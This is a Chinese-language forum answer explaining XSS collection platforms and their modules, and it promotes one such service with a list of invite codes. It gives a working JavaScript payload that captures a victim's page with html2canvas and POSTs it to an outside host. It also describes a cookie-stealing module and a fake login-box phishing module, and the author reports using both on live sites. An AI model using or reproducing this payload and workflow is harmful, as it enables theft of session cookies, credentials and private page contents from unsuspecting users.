xss平台的作用是什麼?

很多種的xss平台,比如xssnow之類的。裡面有很多模塊,這些模塊怎麼用?


通過注入XSS代碼獲取你能在他瀏覽器窗口中甚至設備里能獲取的信息

比如本地存儲的LocalStorage Cookie webSQL等

再比如獲取頁面截圖,如果被攻擊是在訪問一些限定許可權瀏覽的頁面,那麼你也可以一起看。

配置一個截圖功能的 XSS 項目你只需要先引入 JQ、html2canvas 模塊,然後在項目代碼中寫如下代碼就可以了。當然這裡只是為了演示,你可以不依賴任何開源模塊自己實現截圖以及發送功能。

;(function(global,$) {
html2canvas(global.document.body)
.then(canvas =&> {
let base64 = canvas.toDataURL("image/jpeg")
return $.ajax("http://xss.bood.in/api/screenshot" , {
method: "POST",
data: {
file: base64,
id: "{__projectId}"
}
})
})
.then(res =&> {
console.log("success")
})
})(this, $)

XSS 截圖觸發成功之後,可以收到郵件通知(需要在個人設置中設置有效的郵箱)

換域名了Login - Cov XSS

現在還在完善中,先放幾個邀請碼體驗一下吧

未使用

剛剛

c05fc2977d59e4666ccb5604e1b9edf6

未使用

剛剛

3b995a22e1232f10659f6592942b6405

未使用

剛剛

bab276f70a22337a076640f703362588

未使用

7秒前

70e75e00eaf9b1a2834ce7868215baf5

未使用

11秒前

a1ac7748ee9cee1f0ec3a886c6e72650

未使用

11秒前

d3aa07b7c4edd41955c81032125aef4b

未使用

11秒前

d9ad3604e961489d54b024fe68ee4202

未使用

1分鐘前

39d34bc2f911f7ca90a5bb29b39bc63f

未使用

1分鐘前

e28d6dde82a7faa05b38b745e5b57fd9

已使用

1月前

027d4c8654cf588a77850326dd9a9cd8

已使用

1月前

09a4327fdc276afc4854617f2010be15

未使用

1月前


用於收取cookie,賬號等信息。

直接創建項目。

在網站有xss的地方插入項目中的代碼,執行的時候會把對應的信息發送到平台上。

具體看平台上的說明。

默認模塊:

用戶獲取用戶的cookie等信息。

插入xss後,其他用戶訪問的時候幾乎沒有感覺。

但是cookie,訪問的目標等信息都會被發送到平台上。

(上圖是很久前插的,今天去看發現還有很多新的)

基礎認證釣魚模塊:

插入xss後,用戶訪問的時候會彈出一個登陸框,用於輸入用戶名和密碼。

如果用戶粗心地輸入了自己的賬號和密碼,那麼就可以在平台上看到輸入的信息。

(上圖是很久前的,現在已經沒有了)

還有的平台上有自定義js的功能,可以自定義執行的js內容(如可以考慮和csrf一起利用,進行自動轉載點贊等)。


一句話概括:操縱用戶客戶端執行任意js腳本.腳本能實現什麼功能,xss就可以怎樣


推薦閱讀:

最近「佛系」火了,除了90後,大家還發現了哪些具有佛性的事物?
QQ空間自動轉發廣告怎麼解決?(你們要的轉髮網址來了!)
怎樣看待NodeJS模塊node-serialize存在的反序列化漏洞?
用偽中文版 putty 登陸過伺服器後應該怎麼辦?
如何評價「最大的安全公司之一 Norse Corp 瀕臨倒閉」?

TAG:網路安全 | XSS | 滲透測試 | 白帽黑客WhiteHat |